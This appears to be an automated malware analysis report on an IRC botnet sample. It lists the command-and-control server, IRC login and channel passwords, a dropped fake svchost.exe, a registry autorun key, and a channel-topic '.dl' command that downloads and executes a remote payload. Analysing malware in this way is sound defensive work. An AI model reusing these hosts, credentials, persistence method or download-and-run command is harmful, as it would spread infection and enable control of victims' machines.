* Requested Host: net.anddos.co.uk
* Resulting Address: 94.23.153.223
* IRC Data
o User Name: zgtlat
o Host Name: “”
o Server Name:
o Real Name: zgtlat
o Password: dickybob
o Nick Name: ncrrpk
o Non RFC Conform: 1
+ Channel
# Name: #ohai3
# Password: trb123trb
+ Notice Message Deleted
# Value: :irc.goonet.net NOTICE AUTH :*** Looking up your hostname…
# Value: :irc.goonet.net NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
Channel #usb is used for spreading messages
# Transport Protocol: TCP
# Remote Address: 94.23.153.223
# Remote Port: 6667
# Protocol: IRC
PASS dickybob
Joins: ohobwi [qnxgvg@52F1439E.1B24B74B.5FCC8487.IP]
Quits: cwjlgw [nngsix@4AC25E0E.E3C4C12B.345AC400.IP] (Ping timeout)
Joins: Anddosd [Anddos@rox-16A140DD.cable.ubr01.blac.blueyonder.co.uk]
Joins: hhpsvr [nvombw@4AC25E0E.E3C4C12B.345AC400.IP]
Quits: cwsanv [kqnxeh@35D5518B.EFB4043E.560DCF0A.IP] (Ping timeout)
Invisible Users: 599
Channels: 21 channels formed
Clients: I have 612 clients and 0 servers
Local users: Current Local Users: 612 Max: 655
Global users: Current Global Users: 612 Max: 655
File System Modifications
The following files were created in the system:
#  Filename(s)  File Size  File MD5
1  c:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\Desktop.ini  62 bytes  0x7457A5DF1FF47C957ACF1FA000D7D9AD
2  c:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\svchost.exe [file and pathname of the sample #1]  143,360 bytes  0x167B0F3DF365BCB5B239197A3F49F485
The following directory was created:
c:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013
Registry Modifications
The following Registry Key was created:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-11CF-AAX5-81CX1C635612}
The newly created Registry Value is:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-11CF-AAX5-81CX1C635612}]
StubPath = "c:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\svchost.exe"
so that svchost.exe runs every time Windows starts
Host Name            IP Address
net.anddos.co.uk     94.23.153.223
tigerden.uppit.com   69.197.161.218
Download URLs
http://69.197.161.218/save/3112195e69e8f86fd20b9ef96c448284/4b10a730/0209/c0yoabou/ppi_2_.exe (tigerden.uppit.com)
* C&C Server: 94.23.153.223:6667
* Server Password:
* Username: erppma
* Nickname: ruxull
* Channel: #ohai3 (Password: trb123trb)
* Channeltopic: :.dl http://tigerden.uppit.com/save/3112195e69e8f86fd20b9ef96c448284/4b10a730/0209/c0yoabou/ppi_2_.exe c:\p.exe 1
Outgoing connection to remote server: tigerden.uppit.com TCP port 80